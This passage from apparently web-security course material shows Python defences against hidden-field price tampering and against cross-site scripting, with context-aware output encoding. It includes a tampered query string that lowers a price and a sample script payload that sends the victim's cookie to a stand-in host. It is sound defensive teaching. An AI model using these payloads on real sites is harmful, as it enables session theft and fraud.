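# Assumption: a per-deployment secret that never leaves the server, and a
# server-side price list standing in for the shop's product database.
SERVER_KEY = secrets.token_bytes(32)
CATALOG = {"Juggyboy Shirt": "200.00"}

# The slide's two requests, with the query string parsed by the handlers.
NORMAL_QUERY = "product=Juggyboy%20Shirt&price=200.00"
ATTACK_QUERY = "product=Juggyboy%20Shirt&price=2.00"


def sign(product: str, price: str) -> str:
    """HMAC over product and price; 0x1f separates them so the pair is unambiguous."""
    msg = f"{product}\x1f{price}".encode()
    return hmac.new(SERVER_KEY, msg, hashlib.sha256).hexdigest()


def render_form(product: str) -> str:
    """Server-rendered form: the hidden price is accompanied by its signature."""
    price = CATALOG[product]
    return (
        '<form method="post" action="page.aspx">\n'
        f'<input type="hidden" name="price" value="{escape(price)}">\n'
        f'<input type="hidden" name="sig" value="{sign(product, price)}">\n'
        f'Product name: <input type="text" name="product" value="{escape(product)}"><br>\n'
        f"Product price: {escape(price)}<br>\n"
        '<input type="submit" value="submit">\n'
        "</form>"
    )


def fields(query: str) -> dict:
    """First value of each parameter, as a form handler would see them."""
    return {k: v[0] for k, v in parse_qs(query, keep_blank_values=True).items()}


def checkout_vulnerable(query: str) -> str:
    """Charges whatever the client sent; steps 1-5 above turn 200.00 into 2.00."""
    return fields(query)["price"]


def checkout_signed(query: str) -> str:
    """Accept the hidden price only if the server's own signature still matches."""
    f = fields(query)
    expected = sign(f["product"], f["price"])
    if not hmac.compare_digest(expected, f.get("sig", "")):
        raise ValueError("price field was altered or is unsigned")
    return f["price"]


def checkout_lookup(query: str) -> str:
    """Preferred: the client chooses the product, the server decides the price."""
    return CATALOG[fields(query)["product"]]
```

The signed field is useful when the value genuinely must round-trip through the client (a quote that expires, a discount already applied); when the server can simply look the value up, that is the smaller attack surface and the one to prefer.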
59. Cross-Site Scripting (XSS) Attacks
Cross-site scripting ('XSS' or 'CSS') attacks exploit vulnerabilities in dynamically generated web pages, which enables malicious attackers to inject client-side script into web pages viewed by other users. It occurs when unvalidated input data is included in dynamic content that is sent to a user's web browser for rendering. Attackers inject malicious JavaScript, VBScript, ActiveX, HTML, or Flash for execution on a victim's system by hiding it within legitimate requests.
Consequences: session hijacking; brute force password cracking; data theft; intranet probing; keylogging and remote monitoring; malicious script execution; redirecting to a malicious server; exploiting user privileges; ads in hidden IFRAMEs and pop-ups; data manipulation.

Cross-site scripting is also called XSS. The vulnerability occurs when an attacker uses a web application to send malicious code, generally in the form of JavaScript, to other end users. It arises when unvalidated input data is included in dynamic content that is sent to a user's web browser for rendering. When a web application uses input from a user without validating it, an attacker can mount an attack using that input, and the attack can propagate to other users as well. Attackers inject malicious JavaScript, VBScript, ActiveX, HTML, or Flash for execution on a victim's system by hiding it within legitimate requests. The end user trusts the web application, and the attacker exploits that trust to do things that would not be allowed under normal conditions.
An attacker often uses different methods to encode the malicious portion of the tag (for example Unicode), so that the request seems genuine to the user. Attacks that XSS makes possible include:
- Malicious script execution
- Session hijacking
- Brute force password cracking
- Redirecting to a malicious server
- Exploiting user privileges
- Data theft
- Intranet probing
- Ads in hidden IFRAMEs and pop-ups
- Data manipulation
- Keylogging and remote monitoring
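The countermeasure the text implies, shown as an added example rather than courseware code: the same comment rendered with raw string interpolation and with output encoding chosen for the context where the value lands (element body, quoted attribute, and URL attribute, where a scheme allowlist is needed because html.escape leaves javascript: untouched). The payload and the rendering functions are constructed for the example.

```python
import html
from urllib.parse import urlsplit

# Constructed payload of the kind a comment field receives in a session
# hijacking attempt: it ships the victim's cookie to a host the attacker runs.
PAYLOAD = "<script>new Image().src='http://evil/c?'+document.cookie</script>"


def render_comment_vulnerable(name: str, comment: str) -> str:
    """Raw interpolation: whatever the user typed is parsed as markup."""
    return f"<p><b>{name}</b>: {comment}</p>"


def render_comment_safe(name: str, comment: str) -> str:
    """Element-body context: &, <, > (and quotes) become character references."""
    return f"<p><b>{html.escape(name)}</b>: {html.escape(comment)}</p>"


def attr_safe(value: str) -> str:
    """Quoted-attribute context: quote=True also encodes \" and ' so the
    attribute cannot be closed early to start an onmouseover= handler."""
    return html.escape(value, quote=True)


def safe_href(url: str) -> str:
    """URL-attribute context: allowlist the scheme first, then attribute-encode.

    Encoding alone does nothing against javascript:alert(1), which contains
    no character that html.escape would touch.
    """
    scheme = urlsplit(url.strip()).scheme.lower()
    if scheme not in ("http", "https"):
        return "#"
    return attr_safe(url.strip())


def render_profile_link(url: str, label: str) -> str:
    return f'<a href="{safe_href(url)}">{html.escape(label)}</a>'
```

Which encoder is right depends on where the value is inserted; one function applied everywhere is the usual reason a site that "escapes its output" still has XSS in its link and attribute fields.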
